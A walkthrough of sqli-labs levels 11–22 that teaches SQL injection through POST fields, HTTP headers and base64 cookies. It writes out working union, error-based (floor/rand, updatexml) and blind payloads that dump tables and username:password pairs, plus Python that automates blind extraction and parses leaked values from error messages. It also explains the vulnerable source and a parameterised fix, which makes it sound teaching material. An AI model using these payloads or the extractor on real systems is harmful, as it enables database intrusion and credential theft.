Preface:
SQL injection is the entry point to web security, so it has to be learned carefully.
From level 11 onward the lab switches from GET to POST requests; this post starts at level 11.
Level 11
Try the universal password ' or 1=1# : the page echoes a result, so a single quote closes the string. Capture the request in a proxy and inject as before; the only difference from the earlier levels is that the parameter now travels in the POST body instead of the GET query string.
payload:
Determine the number of columns
uname=' order by 1,2,3#
Find the current database
uname=' union select 1,database()#
Enumerate the tables
uname=' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'--+
Dump the columns
uname=' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')--+
Dump the values
uname=' union select 1,group_concat(username,0x3a,password) from users --+
Both # and --+ (the + becomes a space after URL decoding) turn the rest of the statement into a MySQL comment, so the passwd field that follows is never evaluated; 0x3a is a colon used as the separator between username and password.
Source analysis:
The source splices uname and passwd straight into the SQL statement inside single quotes, with no filtering at all, hence the problem.
Level 12
Entering a double quote produces an error message, from which the closing sequence is easily determined to be ")
Nothing else changes, so the technique is the same as in level 11.
Here is one payload:
Dump the columns
uname=") union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')--+
Source code analysis
The source wraps the input in double quotes with $uname='"'.$uname.'"'; and then splices it into the $sql statement; there is a ( in front of $uname, so the sequence to close is "). That is the only change; there is no other protection.
Level 13
Testing ' produces an error message, from which the closing sequence can be determined to be ').
Level 13 differs from the earlier ones in that the query result is no longer displayed, but the error message is, so error-based injection works; the column count and the rest are determined the same way as before.
Dump the database
uname=') union select 1,count(*) from information_schema.columns group by concat(database(),0x3a,floor(rand(0)*2));--+
Dump the tables
uname=') union select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),0x3a,floor(rand(0)*2))x from information_schema.columns group by x;--+
Dump the columns
uname=') union select count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+
Dump the values
uname=') union select count(*),concat((select username from users limit 1,1),0x3a,floor(rand(0)*2))x from information_schema.columns group by x;--+
How this works: floor(rand(0)*2) with a fixed seed produces a fixed sequence (0,1,1,0,1,1,...), and MySQL evaluates it a second time when it inserts a key into the temporary table behind GROUP BY, so the same key gets inserted twice and the query fails with "Duplicate entry '...' for key 'group_key'", where the duplicated key is exactly the value we concatenated in. Each request leaks one row, selected with limit N,1; step the offset to enumerate the rest. Keep the GROUP BY over a table with at least three rows (information_schema.columns always has plenty).
Source code analysis
Apart from the closing sequence changing to '), the only difference in the source is that the query result is no longer printed on success.
Level 14
Testing shows the closing character is ". Otherwise this is the same type of problem as level 13, and the same injection works.
payload:
uname=1" union select 1,count(*) from information_schema.columns group by concat(database(),0x3a,floor(rand(0)*2));--+
Source code analysis
Roughly the same as level 13; nothing more to explain.
Level 15
Entering uname=1' or 1=1# shows a login success, which tells us the closing character is '. This level prints neither error messages nor echoed data, so the options are Boolean-based and time-based blind injection.
Boolean-based blind
uname=1' or ascii(substr((database()),1,1))>115#&passwd=123&submit=Submit
uname=1' or ascii(substr((database()),1,1))=115#&passwd=123&submit=Submit
The first request fails and the second succeeds, so the first character of the database name has ASCII code 115, i.e. s. The remaining characters are guessed the same way; a binary search over the ASCII range needs about seven requests per character instead of up to 95.
Time-based blind
uname=1' or if((ascii(substr(database(),1,1)))>100,1,sleep(10))#
The if() plus sleep() pair tests the ASCII range of a character: when the condition holds the query returns immediately, when it fails the response is delayed by about ten seconds, and from that timing the database name is guessed character by character. Because the condition sits in an OR on the WHERE clause, MySQL evaluates it once per row of users, so the total delay is a multiple of the sleep value; a short sleep of a second or two is enough.
Source code analysis
The error output and the echo of the query result are commented out, so only Boolean or time-based blind injection remains. The SQL statement is the same as before, with no real protection.
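The Boolean-blind procedure above is tedious by hand, so here is an added example (not code from the original post or from sqli-labs) that automates it with a binary search against a simulated level 15 oracle. The oracle is a spliced sqlite3 login query whose only observable output is success or failure; ascii() and database() are registered as user functions because sqlite lacks them, so the probes keep the page's MySQL shape (with -- instead of # as the comment). The users rows and the schema name "security" are constructed assumptions for the simulation.

```python
import sqlite3


def make_oracle():
    """Builds a level 15 style oracle: a spliced login query whose only observable
    output is success or failure. Constructed sample rows, not the lab's data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("Dumb", "Dumb"), ("admin", "admin")])
    # sqlite has no ascii() or database(); register stand-ins so the payloads keep the
    # page's MySQL shape. database() returns the lab's schema name (assumed here).
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function("database", 0, lambda: "security")

    def login_ok(uname, passwd):
        sql = ("SELECT username, password FROM users "
               f"WHERE username='{uname}' and password='{passwd}' LIMIT 0,1")
        try:
            return conn.execute(sql).fetchone() is not None
        except sqlite3.OperationalError:   # level 15 prints no errors: a broken query just fails
            return False
    return login_ok


def extract_blind(login_ok, expr="database()", max_len=64):
    """Recovers the value of expr one character at a time.
    Each probe is the page's payload with the threshold varied:
        1' or ascii(substr((expr),pos,1))>mid--
    A binary search over 0..127 needs 7 probes per character; ascii() of the empty
    string past the end is 0, which terminates the loop.
    Returns (value, number_of_requests)."""
    value, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = -1, 127                    # invariant: lo < code <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            probe = f"1' or ascii(substr(({expr}),{pos},1))>{mid}-- "
            requests += 1
            if login_ok(probe, "123"):
                lo = mid
            else:
                hi = mid
        if hi == 0:                          # ran past the end of the string
            break
        value += chr(hi)
    return value, requests


if __name__ == "__main__":
    oracle = make_oracle()
    print(extract_blind(oracle))                                        # ('security', 63)
    print(extract_blind(oracle, "(select username from users limit 1,1)"))
```

The same extractor works for any scalar subquery, as the second call shows; against a time-based oracle only login_ok changes (measure the response time instead of reading the page).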
Level 16
Testing with uname=1") or 1=1# shows login success, so the closing sequence is "). Nothing else changes from level 15; the same technique applies with the closing sequence swapped into the payloads, so it is not repeated here.
Level 17
From level 17 the page changes (it is now a password reset form), so there should be a new technique to learn.
Injecting through uname gives no result; try passwd instead. Entering a single quote there produces an error message, so the XPath error technique (updatexml) is worth trying, and it works, which is much simpler: the database, tables and so on are dumped straight from the error text. The concat(0x7e,...) wraps the value in ~ so that the argument is not valid XPath and the whole value appears in the error message.
Dump the database
uname=admin&passwd=1' or updatexml(1,concat(0x7e,database(),0x7e),1)# &submit=Submit
Dump the tables
uname=admin&passwd=1' or updatexml(1,(select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA=database()),1)# &submit=Submit
Dump the columns
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 3,1),0x7e),1)#&submit=Submit
Dump the values
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select username from users),0x7e),1)#&submit=Submit
The earlier steps work, but dumping the values fails with the MySQL error:
You can't specify target table for update in FROM clause
A quick search explains it: a statement cannot SELECT from a table and UPDATE that same table at the same time, which also reveals that passwd is spliced into an UPDATE on users.
Reference article
Wrapping the inner query in one more SELECT (a derived table) side-steps the restriction:
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select username from (select username from users)c limit 0,1),0x7e),1)#&submit=Submit
Source code analysis
uname never reaches the statement unescaped, which is why injecting it produced no reaction at all; passwd goes straight into the UPDATE.
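Both error-based techniques on this page, the floor(rand(0)*2) duplicate-key trick of levels 13 and 14 and the updatexml XPath error of levels 17 to 22, leak the data inside an error string, so the practical step is to parse it back out. The following is an added example (not code from the original post or from sqli-labs) that does that and also handles the one limit worth knowing: MySQL shows at most 32 characters of the offending XPath text, so long values (a group_concat of all usernames, say) have to be fetched in substr() windows. The sample error strings are constructed to match MySQL's message shape; they are not captured lab responses.

```python
import re

# Constructed sample error texts in the shape MySQL produces for the two techniques
# (illustrative strings, not responses captured from the lab).
SAMPLE_DUPLICATE = "Duplicate entry 'security:1' for key 'group_key'"
SAMPLE_XPATH = "XPATH syntax error: '~security~'"

DUPLICATE_RE = re.compile(r"Duplicate entry '(.*)' for key '")
XPATH_RE = re.compile(r"XPATH syntax error: '~([^']*)'")

UPDATEXML_LIMIT = 32   # MySQL shows at most 32 characters of the offending XPath text


def leak_from_duplicate(err, sep=":"):
    """floor(rand(0)*2) makes GROUP BY insert the key <value><sep><0|1> twice; the
    duplicated key is echoed in the error. Strips the trailing rand bit and separator
    (sep is ':' for 0x3a, '&' for 0x26 as in the level 13 column payload)."""
    m = DUPLICATE_RE.search(err)
    if not m:
        return None
    value, found, bit = m.group(1).rpartition(sep)
    if found != sep or bit not in ("0", "1"):
        return None
    return value


def leak_from_xpath(err):
    """updatexml(1,concat(0x7e,<value>,0x7e),1): the leading ~ makes the argument invalid
    XPath and the error quotes it. Returns (value, truncated); truncated is True when the
    closing ~ is missing, i.e. the value ran into the 32 character limit."""
    m = XPATH_RE.search(err)
    if not m:
        return None
    body = m.group(1)
    truncated = not body.endswith("~")
    return body.rstrip("~"), truncated


def chunked_updatexml(expr, total_len, chunk=UPDATEXML_LIMIT - 2):
    """Splits a long value into substr() windows that fit the error message together
    with both ~ markers (32 - 2 = 30 characters per request). Returns one
    updatexml(...) expression per window, to be dropped into the page's payloads."""
    return [f"updatexml(1,concat(0x7e,substr(({expr}),{start},{chunk}),0x7e),1)"
            for start in range(1, total_len + 1, chunk)]


if __name__ == "__main__":
    print(leak_from_duplicate(SAMPLE_DUPLICATE))
    print(leak_from_xpath(SAMPLE_XPATH))
    for p in chunked_updatexml("select group_concat(username) from users", 90):
        print(p)
```

When leak_from_xpath reports truncated=True, move on to the next window from chunked_updatexml rather than trusting the partial value.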
Level 18
This time the page shows an IP address, so it looks like another new technique to learn.
The guess is HTTP header injection, but there is no echo at all, so, for lack of a better idea, log in with the username and password uname=admin&passwd=123:
Only after a successful login does the page show the logged data and any error message, so valid credentials are needed first. With those, error-based injection via the XPath error works as in level 17.
Entering User-Agent: 1' produces an error message.
Trying User-Agent: 1' or 1=1# does not give a successful echo.
Using User-Agent: 1' or '1'='1 echoes success, which gives the way of closing the quote: balance the quotes instead of commenting out the tail of the statement. The payloads then follow level 17.
Dump the database
User-Agent: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
The rest is no different from level 17.
Source code analysis
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,20);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
There is a sanitising function here; a quick audit of the code:
substr() limits the length to 20 characters; if the value is not made up only of digits it goes through mysql_real_escape_string(), which escapes special characters including the single quote, so the usual injection through uname and passwd no longer works. Only the User-Agent, which is stored after login without passing through check_input(), can be injected.
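To show why check_input() stops the form fields but not the header, here is an added example (not code from the original post or from sqli-labs) that ports check_input() to Python and runs a simulated level 18 flow under sqlite3: the login fields are escaped, the User-Agent is spliced raw into the INSERT that records the visit. The INSERT's column layout is an assumption modelled on the lab, since the page only shows check_input(); the users row is constructed sample data; and because sqlite has no backslash escape, the port doubles the quote where mysql_real_escape_string would backslash it.

```python
import sqlite3


def check_input(value):
    """Port of the level 18 check_input(): truncate to 20 characters, then either keep a
    pure-digit value as an integer or wrap it in quotes with the quote escaped.
    MySQL's mysql_real_escape_string backslash-escapes; sqlite has no backslash escape, so
    this simulation doubles the quote instead (an assumption made only to run under sqlite)."""
    if value:
        value = value[:20]
    if not value.isdigit():
        return "'" + value.replace("'", "''") + "'"
    return str(int(value))


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE uagents (id INTEGER PRIMARY KEY, uagent TEXT, "
                 "ip_address TEXT, username TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'admin')")  # sample row
    return conn


def login_and_log(conn, uname, passwd, user_agent, ip):
    """uname/passwd go through check_input (which already adds the quotes); the User-Agent
    is spliced raw into the INSERT that records the visit. The INSERT's shape is assumed
    here; the page only shows check_input(). Returns the executed INSERT, or None if the
    login failed (the lab only logs after a successful login)."""
    uname_q, passwd_q = check_input(uname), check_input(passwd)
    row = conn.execute("SELECT username FROM users "
                       f"WHERE username={uname_q} and password={passwd_q} LIMIT 0,1").fetchone()
    if row is None:
        return None
    sql = ("INSERT INTO uagents (uagent, ip_address, username) "
           f"VALUES ('{user_agent}', '{ip}', {uname_q})")
    conn.execute(sql)
    return sql


def last_logged_agent(conn):
    return conn.execute("SELECT uagent FROM uagents ORDER BY id DESC LIMIT 1").fetchone()[0]


def log_safely(conn, uname, user_agent, ip):
    """The fix: bind every value, headers included, instead of relying on check_input()."""
    conn.execute("INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)",
                 (user_agent, ip, uname))
    return last_logged_agent(conn)


if __name__ == "__main__":
    db = make_db()
    print(login_and_log(db, "admin' or '1'='1", "x", "Mozilla/5.0", "10.0.0.1"))  # None
    print(login_and_log(db, "admin", "admin", "1' or '1'='1", "10.0.0.1"))
    print(last_logged_agent(db))            # not the header that was sent
    print(log_safely(db, "admin", "1' or '1'='1", "10.0.0.1"))   # stored verbatim
```

With the page's header payload 1' or '1'='1 the INSERT stays syntactically valid but stores the result of the OR expression rather than the header, which is exactly the balance-the-quotes closing technique from level 18; the bound-parameter version stores the header as a plain string.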
Level 19
Similar to level 18, but this time the injection point is the Referer header.
Test the closing character with Referer: 1' or '1'='1
The XPath error technique should still work.
payload:
Referer: 1' or updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
Source code analysis
The protective code is the same as before; only the INSERT statement has changed slightly.
Level 20
The first step is again a login with a weak password, since some of the information is only visible once logged in. After login the page becomes cookie-based, so capture the request and try to inject:
Cookie: uname=admin'
Try a closing sequence:
Cookie: uname=admin' or '1'='1
Or use the XPath error technique
payload :
Cookie: uname=1' or updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
The rest of the technique is the same as the previous level and is not repeated.
Source code analysis
Only the uname cookie is set; there is nothing else to analyse.
Level 21
Capturing the request shows a cookie uname=YWRtaW4, which base64-decodes to admin. The hint says the cookie is the injection point again, so the previous level's payload works once it is base64-encoded.
Level 22
Change the single quotes to double quotes; otherwise the same payload, base64-encoded, works.
payload :
Cookie: uname=MSIgb3IgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSwxKSBhbmQgIjEiPSIx
(this decodes to 1" or updatexml(1,concat(0x7e,database(),0x7e),1) and "1"="1)
Summary
That is the end of this batch; many new bypass techniques were picked up here. Keep learning!